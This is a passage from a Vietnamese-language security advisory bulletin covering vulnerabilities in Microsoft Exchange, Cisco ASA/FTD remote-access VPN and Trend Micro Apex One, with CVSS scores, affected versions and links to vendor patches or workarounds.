• CVE-2023-36744/36745/36756 – Cảnh báo lỗ hổng thực thi mã từ xa | Microsoft Exchange Server Remote Code Execution Vulnerability

CVSS: 8.0/10

Mô tả: Microsoft Exchange tồn tại lỗ hổng thực thi mã từ xa, khai thác thành công cho phép truy cập và thay đổi thông tin nạn nhân. Ngoài ra, khai thác cũng có thể gây ra down-time trong máy chủ Exchange. Khai thác lỗ hổng yêu cầu xác thực và trong cùng mạng.

Phiên bản ảnh hưởng:

Microsoft Exchange Server 2019 Cumulative Update 13

Microsoft Exchange Server 2016 Cumulative Update 23

Microsoft Exchange Server 2019 Cumulative Update 12

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36744

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36745

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36756

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

• CVE-2023-20269 – Unauthorized Access Vulnerability

CVSS: 5.0/10

Mô tả: CVE-2023-20269 là lỗ hổng truy cập trái phép trong tính năng VPN truy cập từ xa của phần mềm Cisco ASA và FTD. Theo Cisco, lỗ hổng này tồn tại do sự phân tách thiếu chính xác trong mô hình AAA (Authentication, Authorization và Accounting). Khai thác thành công cho phép kẻ tấn công truy cập trái phép vào các phiên VPN, trích xuất các thông tin xác thực của người dùng hợp lệ hoặc thiết lập các phiên clientless SSLVPN.

Phiên bản ảnh hưởng:

Chưa xác định (chờ cập nhật thêm thông tin từ hãng)

Khuyến nghị: Hiện tại, bản cập nhật bảo mật chưa được hãng công bố, trong thời gian chờ đợi bản cập nhật NCS khuyến nghị quý khách hàng thực hiện các biện pháp giảm thiểu được cung cấp bởi hãng trong mục Workarounds và các khuyến nghị bảo mật trong mục Recommendations.

Thông tin chi tiết lỗ hổng, biện pháp giảm thiểu và các khuyến nghị bảo mật xem tại: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ravpn-auth-8LyfCkeC#fs

• CVE-2023-41179– Cảnh báo lỗ hổng thực thi mã tùy ý | Arbitrary Code Execution Vulnerability

CVSS: 9.1/10

Mô tả: Tồn tại lỗ hổng trong mô-đun của bên thứ 3 sử dụng trong Trend Micro Apex One, Worry-Free Business Security và Worry-Free Business Security Services cho phép kẻ tấn công lợi dụng mô-đun để thực thi các lệnh tùy ý trên bản cài đặt bị ảnh hưởng. Khai thác lỗ hổng yêu cầu kẻ tấn công có quyền truy cập vào giao diện quản lý (administrative console access)

Phiên bản ảnh hưởng:

Apex One phiên bản 2019 (On-prem)

Apex One as a Service phiên bản SaaS

Worry-Free Business Security phiên bản 10.0 SP1

Worry-Free Business Security Services phiên bản SaaS

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://success.trendmicro.com/dcx/s/solution/000294994?language=en_US